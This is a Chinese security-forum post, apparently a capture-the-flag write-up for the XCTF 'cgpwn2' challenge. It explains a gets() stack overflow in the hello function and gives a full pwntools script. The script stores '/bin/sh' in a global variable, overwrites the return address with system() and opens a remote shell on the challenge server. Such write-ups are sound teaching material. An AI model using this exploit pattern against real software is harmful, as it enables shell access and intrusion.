安全矩阵

 找回密码
 立即注册
搜索
查看: 2706|回复: 0

XCTF攻防世界cgpwn2

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-4-2 22:08:10 | 显示全部楼层 |阅读模式
cgpwn2题解
首先进行程序基本信息检查:


需要注意的是,在尝试运行程序的过程中,发现对输入进行了验证,这可能对解题产生影响,也可能不会,先留意一下。

IDA查看一下源码:
  • strings查看:
    有system函数,但是有一个"echo hehehe",这给我不好的感觉。。。
  • main函数:
    没什么问题,直接进hello函数
  • hello函数:
    在hello中我们看到了可以存在溢出的gets()函数。

存在栈溢出,又知道system的函数,理论上来讲直接调用system去执行"/bin/sh"就可以了。但是题目没有给出"/bin/sh"。怎么办呢?我们自己构造然后传入进去就可以了。
  • pwn函数:
    发现函数列表中还有一个pwn函数,看一下:
    没什么特殊的,只是告诉你,不能使用之前的直接调用"/bin/sh"了。

在hello函数中,name是一个全局变量,我们将"/bin/sh"传入到name中,那么"/bin/sh"的地址就是name的地址。然后调用system函数去调用就可以了。

首先看一下name的地址:


然后是hello的stack布局:


这里我们使用(0x26 + 4)个数据就可以到达返回地址了。

将返回地址覆盖为system函数的地址,然后再传入我们的name,此时name的地址其实就是"/bin/sh"的地址,相当于给system传入了"/bin/sh"作为参数。

payload的构成已经清晰了:

payload="A"*42+p32(system)+"A"*4+p32(name)

需要给system一个返回地址,随意即可,只要可以保证程序正常运行就行。
EXP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

sh = remote('111.198.29.45',36990)
elf = ELF('./cgpwn2')
bss = 0x0804A080   //name的地址

sh.sendlineafter("name","/bin/sh\x00")

#sys_addr = 0x08048420 //直接在程序中找的
sys_addr = elf.symbols['system']//使用函数获取system地址,推荐这种
payload = "A"*42 + p32(sys_addr) + "A"*4 + p32(bss)

sh.sendlineafter("here",payload)
sh.interactive()

最后成功获取到flag:

总结
这道题其实相对来说挺简单的,就是锻炼一下思路,没有现成的能用的"/bin/sh",我们就可以想办法自己构造一个。

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-10-7 13:15 , Processed in 0.016425 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表